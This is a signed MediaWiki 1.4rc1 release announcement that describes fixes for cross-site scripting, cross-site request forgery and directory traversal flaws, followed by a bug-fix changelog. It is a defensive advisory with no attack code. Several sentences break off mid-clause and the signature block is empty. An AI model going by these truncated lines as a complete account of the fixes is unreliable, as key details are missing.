-----BEGIN PGP SIGNED MESSAGE-----
MediaWiki 1.4rc1 is a security and bug fix release for the 1.4 beta
== Important security updates ==
A security audit found and fixed a number of problems. Users of MediaWiki
1.3.10 and earlier should upgrade to 1.3.11; users of 1.4 beta releases
should upgrade to 1.4rc1.
=== Cross-site scripting vulnerability ===
XSS injection points can be used to hijack session and authentication
cookies as well as more serious attacks.
* Media: links output raw text into an attribute value, potentially
* Additional checks added to file upload to protect against MSIE and
~ Safari MIME-type autodetection bugs.
by default as a general precaution. Sites which want this ability may set
$wgAllowUserCss and $wgAllowUserJs in LocalSettings.php.
=== Cross-site request forgery ===
restricted actions by tricking an authenticated user into visiting
a malicious web page. A fix for page editing in 1.3.10/1.4beta6 has
been expanded in this release to other forms and functions.
Authors of bot tools may need to update their code to include the
=== Directory traversal ===
An unchecked parameter in image deletion could allow an authenticated
administrator to delete arbitary files in directories writable by the
web server, and confirm existence of files not deletable.
== Changes since 1.4beta6 ==
* Fix notice error on nonexistent template in wikitext system message
* (bug 1469) add missing <ul> tags on Special:Log
* (bug 1470) remove extra <ul> tags from Danish log messages
* Fix notice on purge w/ squid mode off
* (bug 1477) hide details of SQL error messages by default
~ Set $wgShowSQLErrors = true for debugging.
* (bug 1430) Don't check for template data when editing page that
* Recentchanges table purging fixed when using table prefix
* (bug 1431) Avoid redundant objectcache garbage collection
* (bug 1474) Switch to better-cached index for statistics page count
* Run Unicode normalization on all input fields
* Fix translation for allpagesformtext2 in LanguageZh_cn and LanguageZh_tw
* Block image revert without valid login
* (bug 1446) stub Bambara (bm) language file using French messages
* (bug 1432) Update Estonian localization
* (bug 1471) unclosed <p> tag in Danish messages
* convertLinks script fixes
* Corrections to template loop detection
* XHTML encoding fix for usernames containing & in Special:Emailuser
* (for zh) Search for variant links even when conversion is turned off,
~ to help prevent duplicate articles.
* Disallow ISO 8859-1 C1 characters and "no-break space" in user names
~ on Latin-1 wikis.
* Correct the name of the main page it LanguageIt
* Allow Special:Makesysop to work for usernames containing SQL special
* Fix annoying blue line in Safari on scaled-down images on description page
* Increase upload sanity checks
* Fix XSS bug in Media: links
* Add cross-site form submission protection to various actions
* Fix fatal error on some dubious page titles
* Stub threshold displays correctly again
Low-traffic release announcements mailing list:
Wiki admin help mailing list:
Bug report system:
Play "stump the developers" live on IRC:
#mediawiki on irc.freenode.net
- -- brion vibber (brion @ pobox.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (Darwin)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
-----END PGP SIGNATURE-----